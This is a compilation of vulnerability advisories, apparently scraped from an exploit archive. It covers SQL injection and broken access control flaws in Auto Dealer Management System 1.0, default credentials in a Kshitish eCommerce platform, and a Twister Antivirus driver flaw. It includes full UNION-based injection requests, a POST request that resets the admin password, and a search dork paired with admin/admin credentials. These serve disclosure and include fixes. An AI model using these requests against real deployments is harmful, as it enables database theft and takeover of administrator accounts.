Management System - SQL Injection on page sell_vehicle.php and parameter is id, application url is (?page=vehicles/sell_vehicle&id=?) with low privilege authentication### Date: > 18 February 2023### CVE Assigned:**[CVE-2023-0913](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0913)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0913) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0913)### Author Name: > Muhammad Navaid Zafar Ansari### Author Email: > navaidnasari@hotmail.co.uk### Vendor Homepage:> https://www.sourcecodester.com### Software Link:> [Auto Dealer Management System](https://www.sourcecodester.com/php/15371/auto-dealer-management-system-phpoop-free-source-code.html)### Version:> v 1.0### SQL Injection> SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data.### Affected Page:> sell_vehicle.php> On this page id parameter is vulnerable to SQL Injection Attack> URL of the vulnerable parameter is: ?page=vehicles/sell_vehicle&id=*### Description:> The auto dealer management system supports two roles of users, one is admin, and another is a normal employee. the detail of role is given below+ Admin user has full access to the system + Employee user has only a few menu access i.e. dashboard, car models and vehicle (available and transaction)> Employee could perform the SQL Injection by opening sell vehicle transaction from his/her profile. Therefore, low-privileged users could able to get the access full system.### Proof of Concept:> Following steps are involved:+ An employee open the sell vehicle transaction form and could perform the SQL injection with vulnerable parameter (?page=vehicles/sell_vehicle&id=1*)### Request:```GET /adms/admin/?page=vehicles/sell_vehicle&id=1%27+and+false+union+select+1,2,version(),database(),5,6,user(),@@datadir,9,10,11,12,13--+- HTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=c1ig2qf0q44toal7cqbqvikli5Connection: close```### Response:![image](https://user-images.githubusercontent.com/123810418/219883719-cd26586d-694e-49a7-a2ba-deca9445382f.png)### Recommendation:> Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack:```Example Code: $sql = $obj_admin->db->prepare("SELECT * from `transaction_list` where id = :id ");$sql->bindparam(':id', $id);$sql->execute();$row = $sql->fetch(PDO::FETCH_ASSOC);```Thank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo--------------------------------------------------------------------------# Auto Dealer Management System - SQL Injection on page manage_user.php and parameter is id, application url is (?page=user/manage_user&id=?) with low privilege authentication.### Date: > 18 February 2023### CVE Assigned:**[CVE-2023-0915](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0915)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0915) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0915)### Author Name: > Muhammad Navaid Zafar Ansari### Author Email: > navaidnasari@hotmail.co.uk### Vendor Homepage:> https://www.sourcecodester.com### Software Link:> [Auto Dealer Management System](https://www.sourcecodester.com/php/15371/auto-dealer-management-system-phpoop-free-source-code.html)### Version:> v 1.0### SQL Injection> SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data.### Affected Page:> manage_user.php> On this page id parameter is vulnerable to SQL Injection Attack> URL of the vulnerable parameter is: ?page=user/manage_user&id=*### Description:> The auto dealer management system supports two roles of users, one is admin, and another is a normal employee. the detail of role is given below+ Admin user has full access to the system + Employee user has only a few menu access i.e. dashboard, car models and vehicle (available and transaction)> Although, employee user doesn't have manage_user.php access but due to broken access control, employee could able to perform the SQL Injection by opening manage_user.php page. Therefore, low-privileged users could able to get the access full system.### Proof of Concept:> Following steps are involved:1. Employee guess the page manager_user.php and pass the random id parameter that parameter is vulnerable to SQL injection (?page=user/manage_user&id=1*)### Request:```GET /adms/admin/?page=user/manage_user&id=1%27+and+false+union+select+1,user(),@@datadir,4,database(),6,7,8,9,10,11--+- HTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=c1ig2qf0q44toal7cqbqvikli5Connection: close```### Response:![image](https://user-images.githubusercontent.com/123810418/219888637-627e3abb-4b7a-45e6-a22c-3a5c11b75b61.png)### Recommendation:> Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack:```Example Code: $sql = $obj_admin->db->prepare("SELECT * FROM users where id = :id ");$sql->bindparam(':id', $id);$sql->execute();$row = $sql->fetch(PDO::FETCH_ASSOC);```Thank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo

Auto Dealer Management System 1.0 SQL Injection

Auto Dealer Management System version 1.0 suffers from a privilege escalation vulnerability due to a broken access control where a lower privileged user's cookie can be leveraged to takeover an administrative account.

# Auto Dealer Management System - Broken Access Control leads to compromise of all application accounts by accessing the ?page=user/list with low privileged user account

### Date:   
> 18 February 2023  
### Author Email:   
> navaidnasari@hotmail.co.uk  
### Vendor Homepage:  
> https://www.sourcecodester.com  
### Software Link:  
> [Auto Dealer Management System](https://www.sourcecodester.com/php/15371/auto-dealer-management-system-phpoop-free-source-code.html)  
### Version:  
> v 1.0  
### Broken Authentication:  
> Broken Access Control is a type of security vulnerability that occurs when a web application fails to properly restrict users' access to certain resources and functionality. Access control is the process of ensuring that users are authorized to access only the resources and functionality that they are supposed to. Broken Access Control can occur due to poor implementation of access controls in the application, failure to validate input, or insufficient testing and review.

### Affected Page:  
> list.php , manage_user.php

> On these page, application isn't verifying the authorization mechanism. Due to that, all the parameters are vulnerable to broken access control and low privilege user could view the list of user's and change any user password to access it.

### Description:  
> Broken access control allows low privilege attacker to change password of all application users

### Proof of Concept:  
> Following steps are involved:  
1. Visit the vulnerable page: ?page=user/list  
2. Click on Action and Edit the password of Admin

![image](https://user-images.githubusercontent.com/123810418/219884701-0f1feb4f-6c8a-4299-b510-1762461910ee.png)

4. Update the Password and Submit

5. Request:  
```  
POST /adms/classes/Users.php?f=save HTTP/1.1  
Host: localhost  
Content-Length: 877  
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"  
Accept: */*  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfODLB5j55MvB5pGU  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36  
sec-ch-ua-platform: "Windows"  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/adms/admin/?page=user/manage_user&id=1  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=c1ig2qf0q44toal7cqbqvikli5  
Connection: close

------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="id"

1  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="firstname"

Adminstrator  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="middlename"

------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="lastname"

Admin  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="username"

admin  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="password"

admin123  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="type"

1  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="img"; filename=""  
Content-Type: application/octet-stream

------WebKitFormBoundaryfODLB5j55MvB5pGU--

```  
6. Successful exploit screenshots are below (without cookie parameter)  
![image](https://user-images.githubusercontent.com/123810418/219884923-5283fca6-d509-4c48-9db0-f61ea6dbb352.png)

7. Vulnerable Code Snippets:

![image](https://user-images.githubusercontent.com/123810418/219884994-e74d7d48-4d45-4135-9a38-45e26c65434b.png)

![image](https://user-images.githubusercontent.com/123810418/219885023-a76afbe0-88f0-4aaa-89cd-1e541e511427.png)

### Recommendation:  
> Whoever uses this CMS, should update the authorization mechanism on top of the  list.php , manage_user.php pages as per requirement to avoid a Broken Access Control attack

Thank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo

Auto Dealer Management System 1.0 Privilege Escalation

Kshitish Multipurpose eCommerce Platform version 2.0 leaves default administrative credentials installed post installation.

    ====================================================================================================================================| # Title     : kshitish v2.0 Multipurpose eCommerce Platform Insecure Settings Vulnerability                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(64-bit)                                              | | # Vendor    : https://www.yahoobaba.net/                                                                                         |  | # Dork      : "Created by YahooBaba"                                                                                             |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password  [+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=admin  & pass=admin [+] http://127.0.0.1-stor.com/admin/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Kshitish 2.0 Default Credentials

A vulnerability was found in Twister Antivirus 8.17. It has been declared as critical. This vulnerability affects unknown code in the library filmfd.sys of the component IoControlCode Handler. The manipulation leads to improper access controls. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221740.

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Tag

#windows